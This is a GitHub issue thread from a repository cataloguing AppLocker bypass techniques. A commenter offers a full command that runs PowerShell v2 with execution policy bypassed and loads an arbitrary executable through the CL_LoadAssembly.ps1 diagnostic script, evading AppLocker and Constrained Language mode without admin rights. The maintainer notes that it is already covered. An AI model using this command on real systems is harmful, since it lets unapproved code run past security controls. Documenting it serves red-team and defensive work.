CL_LoadAssembly.ps1 - Similar to already listed CL_Invocation.ps1 and Powershell version 2

api0cradle / UltimateAppLockerByPassList

The goal of this repository is to document the most common techniques to bypass AppLocker.

1.91k stars 353 forks source link

CL_LoadAssembly.ps1 - Similar to already listed CL_Invocation.ps1 and Powershell version 2 #3

Closed ghost closed 6 years ago

ghost commented 6 years ago

You might want to add this:

powershell -v 2 -ep bypass cd C:\windows\diagnostics\system\AERO import-module .\CL_LoadAssembly.ps1 LoadAssemblyFromPath ........\temp\funrun.exe

Requires admin: No Windows binary: Yes Bypasses AppLocker Default rules: Yes Bypasses Constrained Language mode by invoking PowerShell version 2 Notes: Requires PowerShell version 2

Links: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/

api0cradle commented 6 years ago

I removed the CL_Invocation since it relies on PowerShell v2. So the bypass is actually PowerShell version 2 and it is listed in the generic bypasses. Thanks for pointing it out.